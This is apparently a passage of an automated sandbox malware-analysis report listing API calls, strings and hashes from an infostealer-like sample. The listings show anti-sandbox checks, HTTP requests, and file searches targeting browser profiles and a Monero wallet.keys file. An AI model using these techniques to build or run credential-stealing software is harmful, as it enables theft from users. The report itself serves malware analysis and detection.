                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3404098578-2766056989
                            • Opcode ID: 1cd61bcf0ae7434bb78dc9603fcece12ff3f386902183a82b7ef4fa8ee7e72ab
                            • Instruction ID: 6e82f593510332252ff446f41974e9365c51503808b374279c4e3ad64fee0c0c
                            • Opcode Fuzzy Hash: 1cd61bcf0ae7434bb78dc9603fcece12ff3f386902183a82b7ef4fa8ee7e72ab
                            • Instruction Fuzzy Hash: BB014BB0A44308EAEB10DBE0CD4ABEEBBB8AB04715F609498E705B6280D67566419799

                            Control-flow Graph

                            control_flow_graph 1450 ec6af3 1451 ec6b0a 1450->1451 1453 ec6b0c-ec6b22 call ec6920 call ec5b10 CloseHandle ExitProcess 1451->1453 1454 ec6aba-ec6ad7 call ecaad0 OpenEventA 1451->1454 1460 ec6ad9-ec6af1 call ecaad0 CreateEventA 1454->1460 1461 ec6af5-ec6b04 CloseHandle Sleep 1454->1461 1460->1453 1461->1451
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00A98AC8,?,00ED110C,?,00000000,?,00ED1110,?,00000000,00ED0AEF), ref: 00EC6ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EC6AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00EC6AF9
                            • Sleep.KERNEL32(00001770), ref: 00EC6B04
                            • CloseHandle.KERNEL32(?,00000000,?,00A98AC8,?,00ED110C,?,00000000,?,00ED1110,?,00000000,00ED0AEF), ref: 00EC6B1A
                            • ExitProcess.KERNEL32 ref: 00EC6B22
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: c49c864e2b71e5fdcbea44144aa788c18bf8e8409e9de45708ef92bdd1d3c777
                            • Instruction ID: 49976c30c7ad77086ffd1cb4bb566a3b38c7004e267bf754c189ad94efa3d395
                            • Opcode Fuzzy Hash: c49c864e2b71e5fdcbea44144aa788c18bf8e8409e9de45708ef92bdd1d3c777
                            • Instruction Fuzzy Hash: 04F03070A40209EEEB20ABA09E06FBE7B74FB04705F10551CB517B2581DBB66942D755

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EB4839
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00EB4849
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: c957ea2554e194c302a0f69bfbb6deed307534c572acf014cace44ce6b845c64
                            • Instruction ID: 94168a0a254453b844b2fa873e6a50567430bc0fc4a139e0d71d958b31b7aac7
                            • Opcode Fuzzy Hash: c957ea2554e194c302a0f69bfbb6deed307534c572acf014cace44ce6b845c64
                            • Instruction Fuzzy Hash: 4E2150B1D00208ABDF14DFA5E945BDE7778FB45320F108629F515B7280DB706609CB91

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB6280: InternetOpenA.WININET(00ED0DFE,00000001,00000000,00000000,00000000), ref: 00EB62E1
                              • Part of subcall function 00EB6280: StrCmpCA.SHLWAPI(?,00A9E3D0), ref: 00EB6303
                              • Part of subcall function 00EB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EB6335
                              • Part of subcall function 00EB6280: HttpOpenRequestA.WININET(00000000,GET,?,00A9DC50,00000000,00000000,00400100,00000000), ref: 00EB6385
                              • Part of subcall function 00EB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EB63BF
                              • Part of subcall function 00EB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EB63D1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EC5228
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: f622ca370170bbb9e804c7de426c8a02b859bd25e750b068cc24674df61578bb
                            • Instruction ID: 2a106d06bdc592de43df52cbd73f03d6231eaa2143447ce1e24071de5ebef5d5
                            • Opcode Fuzzy Hash: f622ca370170bbb9e804c7de426c8a02b859bd25e750b068cc24674df61578bb
                            • Instruction Fuzzy Hash: 2B110D3190010CA7CB18FF60DA56FED73B8AF50304F84616CF81A6A592EF366B07C691
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EB112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00EB1132
                            • ExitProcess.KERNEL32 ref: 00EB1143
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: 1b08f5bbb2931c77a919a0679a7fbff0cda40ec33e00184d11034f9ad88f44a5
                            • Instruction ID: c60edee57d392d09762260224c3b967789038c6a714eabe74a85a0d8d7a2c48d
                            • Opcode Fuzzy Hash: 1b08f5bbb2931c77a919a0679a7fbff0cda40ec33e00184d11034f9ad88f44a5
                            • Instruction Fuzzy Hash: 09E08670A45308FFE7206BA0DC0BB4976B8AB04B11F500088F70D775C4C6F926019B98
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00EB10B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00EB10F7
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 4dea9a0f7732a2e55a8271f89cfc7dbc903520804ff884d9862dcb30bd69acfc
                            • Instruction ID: 267e47a46f6c26110389a8597bd1a74adfe4ea7802968920f45963ee790a203d
                            • Opcode Fuzzy Hash: 4dea9a0f7732a2e55a8271f89cfc7dbc903520804ff884d9862dcb30bd69acfc
                            • Instruction Fuzzy Hash: 29F0E271641308BBE714AAA4AD5AFABB7E8E705B25F301448F548E3280D572AE00CBA0
                            APIs
                              • Part of subcall function 00EC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC7910
                              • Part of subcall function 00EC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00EC7917
                              • Part of subcall function 00EC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00EC792F
                              • Part of subcall function 00EC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EB11B7), ref: 00EC7880
                              • Part of subcall function 00EC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00EC7887
                              • Part of subcall function 00EC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EC789F
                            • ExitProcess.KERNEL32 ref: 00EB11C6
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: 457370352881d1aab45a1a7373ffda29c67279effb7665c37bccc9de3cdf42ae
                            • Instruction ID: ee1d8b6c851909b2092d41c57bd5a08e9635698c7b6948f2352936b5cd5151e8
                            • Opcode Fuzzy Hash: 457370352881d1aab45a1a7373ffda29c67279effb7665c37bccc9de3cdf42ae
                            • Instruction Fuzzy Hash: 73E012B6A1431197DA5473B5AF1BF2B32DC5B14749F04242CFA49F7602FA2BF8018A65
                            APIs
                            • wsprintfA.USER32 ref: 00EC38CC
                            • FindFirstFileA.KERNEL32(?,?), ref: 00EC38E3
                            • lstrcat.KERNEL32(?,?), ref: 00EC3935
                            • StrCmpCA.SHLWAPI(?,00ED0F70), ref: 00EC3947
                            • StrCmpCA.SHLWAPI(?,00ED0F74), ref: 00EC395D
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EC3C67
                            • FindClose.KERNEL32(000000FF), ref: 00EC3C7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 93e31b089afffb10d5da67b4a56fd02b69f2b5227fefe9beeae3890702626899
                            • Instruction ID: 23632c789fae6029f5410ee3cbfc7cd46f0691b6900c406a0b151831bc686440
                            • Opcode Fuzzy Hash: 93e31b089afffb10d5da67b4a56fd02b69f2b5227fefe9beeae3890702626899
                            • Instruction Fuzzy Hash: E2A130B1A002089BDB34DB64DD89FEE73B8FB88300F04858DA54DA7545EB769B85CF61
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • FindFirstFileA.KERNEL32(00000000,?,00ED0B32,00ED0B2B,00000000,?,?,?,00ED13F4,00ED0B2A), ref: 00EBBEF5
                            • StrCmpCA.SHLWAPI(?,00ED13F8), ref: 00EBBF4D
                            • StrCmpCA.SHLWAPI(?,00ED13FC), ref: 00EBBF63
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EBC7BF
                            • FindClose.KERNEL32(000000FF), ref: 00EBC7D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-726946144
                            • Opcode ID: f0c62f1382e7ec30671546aaed4e8df5de9543a4688a0f0d8c63a7f8b7c940ec
                            • Instruction ID: 0d8ef30172702d7795a6f929c81e80a5e15f35b45ac98947b6556ed543259cbd
                            • Opcode Fuzzy Hash: f0c62f1382e7ec30671546aaed4e8df5de9543a4688a0f0d8c63a7f8b7c940ec
                            • Instruction Fuzzy Hash: 06425672900108ABCB14FB70DE56FEE73BDAB84304F44556DB50AB6181EE359F4ACB92
                            APIs
                            • wsprintfA.USER32 ref: 00EC492C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00EC4943
                            • StrCmpCA.SHLWAPI(?,00ED0FDC), ref: 00EC4971
                            • StrCmpCA.SHLWAPI(?,00ED0FE0), ref: 00EC4987
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EC4B7D
                            • FindClose.KERNEL32(000000FF), ref: 00EC4B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 82f1d1791b2b668d8c804ac6943c7ed4d181818984fb560c6d964339ff686610
                            • Instruction ID: 3c1f87b22eb3b0b35bb946e1cee4b8945626d04fdeccfd8b8414412f5539aeb3
                            • Opcode Fuzzy Hash: 82f1d1791b2b668d8c804ac6943c7ed4d181818984fb560c6d964339ff686610
                            • Instruction Fuzzy Hash: 626166B1600218ABCB34EBA0DD59FEA73BCFB48700F04558CB54DA6145EB769B46CFA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EC4580
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC4587
                            • wsprintfA.USER32 ref: 00EC45A6
                            • FindFirstFileA.KERNEL32(?,?), ref: 00EC45BD
                            • StrCmpCA.SHLWAPI(?,00ED0FC4), ref: 00EC45EB
                            • StrCmpCA.SHLWAPI(?,00ED0FC8), ref: 00EC4601
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EC468B
                            • FindClose.KERNEL32(000000FF), ref: 00EC46A0
                            • lstrcat.KERNEL32(?,00A9E400), ref: 00EC46C5
                            • lstrcat.KERNEL32(?,00A9D700), ref: 00EC46D8
                            • lstrlen.KERNEL32(?), ref: 00EC46E5
                            • lstrlen.KERNEL32(?), ref: 00EC46F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 407896670adf5face1404b2aa691998bce2c388a51256dd1bbde9b2a704a7dcf
                            • Instruction ID: 00e16b80b0a09a08ecd918f6cd33d48b7f26c09459f3a83cd94c711684f719e8
                            • Opcode Fuzzy Hash: 407896670adf5face1404b2aa691998bce2c388a51256dd1bbde9b2a704a7dcf
                            • Instruction Fuzzy Hash: 525158B16002189BC734EB70DD9AFE9737CAB58700F40558DB54DA3184EB769B85CF91
                            APIs
                            • wsprintfA.USER32 ref: 00EC3EC3
                            • FindFirstFileA.KERNEL32(?,?), ref: 00EC3EDA
                            • StrCmpCA.SHLWAPI(?,00ED0FAC), ref: 00EC3F08
                            • StrCmpCA.SHLWAPI(?,00ED0FB0), ref: 00EC3F1E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EC406C
                            • FindClose.KERNEL32(000000FF), ref: 00EC4081
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: 05e0523d68368f8763a3e17ca9a1633438ef57dcf1d38497495f827991f4c268
                            • Instruction ID: 5b1bc4b3b066d6fb4f24d88a61b85cc578d7d4f6aaf361e667128297281fd3be
                            • Opcode Fuzzy Hash: 05e0523d68368f8763a3e17ca9a1633438ef57dcf1d38497495f827991f4c268
                            • Instruction Fuzzy Hash: 465144B2900218EBCB34EBB0DD46FEA73BCBB48300F44459DB65DA6044DB769B868F51
                            APIs
                            • wsprintfA.USER32 ref: 00EBED3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 00EBED55
                            • StrCmpCA.SHLWAPI(?,00ED1538), ref: 00EBEDAB
                            • StrCmpCA.SHLWAPI(?,00ED153C), ref: 00EBEDC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EBF2AE
                            • FindClose.KERNEL32(000000FF), ref: 00EBF2C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: fdab186a246f8a37f307f23a51ba61b6d55ce26f3ac4a321b912572ef7cda1bb
                            • Instruction ID: e52d1ab69f985a5c67cd5302bdfdac39ada355048a6cbbc0738843ec2271cce1
                            • Opcode Fuzzy Hash: fdab186a246f8a37f307f23a51ba61b6d55ce26f3ac4a321b912572ef7cda1bb
                            • Instruction Fuzzy Hash: 85E1EA7291111C9AEB28EB60DD56FEE73B8AF54304F4451ADB40A72092EE316F8BCF51
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00ED15B8,00ED0D96), ref: 00EBF71E
                            • StrCmpCA.SHLWAPI(?,00ED15BC), ref: 00EBF76F
                            • StrCmpCA.SHLWAPI(?,00ED15C0), ref: 00EBF785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EBFAB1
                            • FindClose.KERNEL32(000000FF), ref: 00EBFAC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: bdf3d46be8b2372434c7199485705ebc606bf7f4a782566f5db8b30e50cc6518
                            • Instruction ID: e627c087d89a7eae50490b8dc729164d98c08af3cdb1ef069a5fe8b9c78371f9
                            • Opcode Fuzzy Hash: bdf3d46be8b2372434c7199485705ebc606bf7f4a782566f5db8b30e50cc6518
                            • Instruction Fuzzy Hash: FEB144729001189BCB28EF60DD56FEE73B9AF54304F4495BDE40AA7141EF315B4ACB91
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00ED510C,?,?,?,00ED51B4,?,?,00000000,?,00000000), ref: 00EB1923
                            • StrCmpCA.SHLWAPI(?,00ED525C), ref: 00EB1973
                            • StrCmpCA.SHLWAPI(?,00ED5304), ref: 00EB1989
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EB1D40
                            • DeleteFileA.KERNEL32(00000000), ref: 00EB1DCA
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EB1E20
                            • FindClose.KERNEL32(000000FF), ref: 00EB1E32
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
